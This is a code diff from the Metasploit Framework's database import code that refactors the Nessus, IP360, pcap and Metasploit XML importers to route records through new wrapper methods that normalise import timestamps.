    rescue ActiveRecord::RecordNotUnique, ActiveRecord::RecordInvalid
@@ -480,23 +480,84 @@ module Msf::DBManager::Import
    raise Msf::DBImportError.new("Could not automatically determine file type")
  end

-  # Handles timestamps from Metasploit Express/Pro imports.
-  def msf_import_timestamps(opts,obj)
+  def msf_import_service(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_service(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_vuln(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_vuln(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_note(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_note(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_host(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_host(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_task(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_task(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_user(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_user(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_loot(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_loot(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_web_site(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_web_site(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_web_page(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_web_page(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_web_vuln(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_web_vuln(normalised_import_timestamp_opts)
+  end
+
+  def msf_import_artifact(opts)
+    normalised_import_timestamp_opts = msf_normalise_import_timestamps(opts)
+    report_artifact(normalised_import_timestamp_opts)
+  end
+
+  # Assigns created_at and updated_at time stamps to an object.
+  def msf_assign_timestamps(opts,obj)
    obj.created_at = opts["created_at"] if opts["created_at"]
    obj.created_at = opts[:created_at] if opts[:created_at]
-    obj.updated_at = opts["updated_at"] ? opts["updated_at"] : obj.created_at
-    obj.updated_at = opts[:updated_at] ? opts[:updated_at] : obj.created_at
-    return obj
+    obj.updated_at = opts["updated_at"] if opts["updated_at"]
+    obj.updated_at = opts[:updated_at] if opts[:updated_at]
+  end
+
+  # Handles timestamps from Metasploit Express/Pro imports.
+  def msf_normalise_import_timestamps(opts)
+    opts[:created_at] ||= (opts["created_at"] || ::Time.now.utc)
+    opts[:updated_at] ||= (opts["updated_at"] || opts[:created_at])
+    opts
  end

  def report_import_note(wspace,addr)
    if @import_filedata.kind_of?(Hash) && @import_filedata[:filename] && @import_filedata[:filename] !~ /msfe-nmap[0-9]{8}/
-    report_note(
-      :workspace => wspace,
-      :host => addr,
-      :type => 'host.imported',
-      :data => @import_filedata.merge(:time=> Time.now.utc)
-    )
+      msf_import_note(
+        :workspace => wspace,
+        :host => addr,
+        :type => 'host.imported',
+        :data => @import_filedata.merge(:time=> Time.now.utc)
+      )
    end
  end

@@ -27,7 +27,7 @@ module Msf::DBManager::Import::GPP
    end

    # Store entire file as loot, including metadata
-    report_loot(
+    msf_import_loot(
      workspace: wspace,
      path:      args[:filename],
      name:      File.basename(args[:filename]),
@@ -83,11 +83,11 @@ module Msf::DBManager::Import::IP360::V3
      host_hash[:name] = hname.to_s.strip if hname
      host_hash[:mac]  = mac.to_s.strip.upcase if mac

-      hobj = report_host(host_hash)
+      hobj = msf_import_host(host_hash)

      yield(:os, os) if block
      if os
-        report_note(
+        msf_import_note(
          :workspace => wspace,
          :task => args[:task],
          :host => hobj,
@@ -131,7 +131,7 @@ module Msf::DBManager::Import::IP360::V3
  # IP360 v3 svc
  def handle_ip360_v3_svc(wspace,hobj,port,proto,hname,task=nil)
    addr = hobj.address
-    report_host(:workspace => wspace, :host => hobj, :state => Msf::HostState::Alive, :task => task)
+    msf_import_host(:workspace => wspace, :host => hobj, :state => Msf::HostState::Alive, :task => task)

    info = { :workspace => wspace, :host => hobj, :port => port, :proto => proto, :task => task }
    if hname != "unknown" and hname[-1,1] != "?"
@@ -139,7 +139,7 @@ module Msf::DBManager::Import::IP360::V3
    end

    if port.to_i != 0
-      report_service(info)
+      msf_import_service(info)
    end
  end

@@ -153,7 +153,7 @@ module Msf::DBManager::Import::IP360::V3
    end

    if port.to_i != 0
-      report_service(info)
+      msf_import_service(info)
    end

    refs = []
@@ -181,6 +181,6 @@ module Msf::DBManager::Import::IP360::V3
      vuln[:proto] = proto
    end

-    report_vuln(vuln)
+    msf_import_vuln(vuln)
  end
 end
@@ -35,7 +35,7 @@ module Msf::DBManager::Import::Libpcap
      unless( bl.include?(saddr) || rfc3330_reserved(saddr))
        yield(:address,saddr) if block and !seen_hosts.keys.include?(saddr)
        unless seen_hosts[saddr]
-          report_host(
+          msf_import_host(
              :workspace => wspace,
              :host      => saddr,
              :state     => Msf::HostState::Alive,
@@ -48,7 +48,7 @@ module Msf::DBManager::Import::Libpcap
      unless( bl.include?(daddr) || rfc3330_reserved(daddr))
        yield(:address,daddr) if block and !seen_hosts.keys.include?(daddr)
        unless seen_hosts[daddr]
-          report_host(
+          msf_import_host(
              :workspace => wspace,
              :host      => daddr,
              :state     => Msf::HostState::Alive,
@@ -63,7 +63,7 @@ module Msf::DBManager::Import::Libpcap
          pkt.tcp_src < 1024 # If it's a low port, assume it's a proper service.
          if seen_hosts[saddr]
            unless seen_hosts[saddr].include? [pkt.tcp_src,"tcp"]
-              report_service(
+              msf_import_service(
                  :workspace => wspace, :host => saddr,
                  :proto     => "tcp", :port => pkt.tcp_src,
                  :state     => Msf::ServiceState::Open,
@@ -79,7 +79,7 @@ module Msf::DBManager::Import::Libpcap
          [saddr,daddr].each do |xaddr|
            if seen_hosts[xaddr]
              unless seen_hosts[xaddr].include? [pkt.udp_src,"udp"]
-                report_service(
+                msf_import_service(
                    :workspace => wspace, :host => xaddr,
                    :proto     => "udp", :port => pkt.udp_src,
                    :state     => Msf::ServiceState::Open,
@@ -93,7 +93,7 @@ module Msf::DBManager::Import::Libpcap
        elsif pkt.udp_src < 1024 # Probably a service
          if seen_hosts[saddr]
            unless seen_hosts[saddr].include? [pkt.udp_src,"udp"]
-              report_service(
+              msf_import_service(
                  :workspace => wspace, :host => saddr,
                  :proto     => "udp", :port => pkt.udp_src,
                  :state     => Msf::ServiceState::Open,
@@ -142,7 +142,7 @@ module Msf::DBManager::Import::Libpcap
      if pkt.payload =~ /^HTTP\x2f1\x2e[01]/n
        http_server_match = pkt.payload.match(/\nServer:\s+([^\r\n]+)[\r\n]/n)
        if http_server_match.kind_of?(MatchData) and http_server_match[1]
-          report_service(
+          msf_import_service(
              :workspace => wspace,
              :host      => pkt.ip_saddr,
              :port      => pkt.tcp_src,
@@ -172,7 +172,7 @@ module Msf::DBManager::Import::Libpcap
        # this point, we'll just believe everything the packet says -- validation ought
        # to come later.
        user,pass = b64_cred.unpack("m*").first.split(/:/,2)
-        report_service(
+        msf_import_service(
            :workspace => wspace,
            :host      => pkt.ip_daddr,
            :port      => pkt.tcp_dst,
@@ -85,7 +85,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
        note_data[datum.gsub("-","_")] = nils_for_nulls(note.at(datum).text.to_s.strip)
      end
    }
-    report_note(note_data)
+    msf_import_note(note_data)
  end

  # Imports web_form element using Msf::DBManager#report_web_form.
@@ -294,7 +294,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
      end
    }

-    report_web_site(info)
+    msf_import_web_site(info)
    yield(:web_site, "#{info[:host]}:#{info[:port]} (#{info[:vhost]})") if block
  end

@@ -331,7 +331,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
      end
    }
    host_address = host_data[:host].dup # Preserve after report_host() deletes
-    hobj = report_host(host_data)
+    hobj = msf_import_host(host_data)

    host.xpath("host_details/host_detail").each do |hdet|
      hdet_data = {}
@@ -371,7 +371,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
          end
        end
      }
-      report_service(service_data)
+      msf_import_service(service_data)
    end

    host.xpath('notes/note').each do |note|
@@ -417,7 +417,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
        end
      end

-      vobj = report_vuln(vuln_data)
+      vobj = msf_import_vuln(vuln_data)

      vuln.xpath("notes/note").each do |note|
        note_data = {}
@@ -144,7 +144,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
      if ::File.exist?(new_task)
        ::File.unlink new_task # Delete it, and don't report it.
      else
-        report_task(task_info) # It's new, so report it.
+        msf_import_task(task_info) # It's new, so report it.
      end
      ::FileUtils.copy(task_info[:orig_path], new_task)
      yield(:msf_task, new_task) if block
@@ -30,7 +30,7 @@ module Msf::DBManager::Import::Nessus
    if name and name != "unknown" and name[-1,1] != "?"
      info[:name] = name
    end
-    report_service(info)
+    msf_import_service(info)

    if nasl.nil? || nasl.empty? || nasl == 0 || nasl == "0"
      return
@@ -78,6 +78,6 @@ module Msf::DBManager::Import::Nessus
      :refs => refs,
      :task => task,
    }
-    report_vuln(vuln_info)
+    msf_import_vuln(vuln_info)
  end
 end
@@ -45,7 +45,7 @@ module Msf::DBManager::Import::Nessus::NBE
        yield(:address,addr) if block
      end

-      hobj_map[ addr ] ||= report_host(:host => addr, :workspace => wspace, :task => args[:task])
+      hobj_map[ addr ] ||= msf_import_host(:host => addr, :workspace => wspace, :task => args[:task])

      # Match the NBE types with the XML severity ratings
      case type
@@ -61,7 +61,7 @@ module Msf::DBManager::Import::Nessus::NBE
      end
      if nasl == "11936"
        os = data.match(/The remote host is running (.*)\\n/)[1]
-        report_note(
+        msf_import_note(
          :workspace => wspace,
          :task => args[:task],
          :host => hobj_map[ addr ],
@@ -34,13 +34,13 @@ module Msf::DBManager::Import::Nessus::XML::V1

      # Record the hostname
      hinfo.merge!(:name => hname.to_s.strip) if hname
-      hobj = report_host(hinfo)
+      hobj = msf_import_host(hinfo)
      report_import_note(wspace,hobj)

      # Record the OS
      os ||= host.elements["os_name"]
      if os
-        report_note(
+        msf_import_note(
          :workspace => wspace,
          :task => args[:task],
          :host => hobj,
@@ -50,13 +50,13 @@ module Msf::DBManager::Import::Nessus::XML::V2
      # We can't use them anyway, so take just the first.
      host_info[:mac]  = mac.to_s.strip.upcase.split(/\s+/).first if mac

-      hobj = report_host(host_info)
+      hobj = msf_import_host(host_info)
      report_import_note(wspace,hobj)

      os = host['os']
      yield(:os,os) if block
      if os
-        report_note(
+        msf_import_note(
          :workspace => wspace,
          :task => args[:task],
          :host => hobj,
@@ -110,7 +110,7 @@ module Msf::DBManager::Import::Nessus::XML::V2
    end

    if port.to_i != 0
-      report_service(info)
+      msf_import_service(info)
    end

    if nasl.nil? || nasl.empty? || nasl == 0 || nasl == "0"
@@ -159,6 +159,6 @@ module Msf::DBManager::Import::Nessus::XML::V2
      vuln[:proto] = proto
    end

-    report_vuln(vuln)
+    msf_import_vuln(vuln)
  end
 end
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.5
 .1.5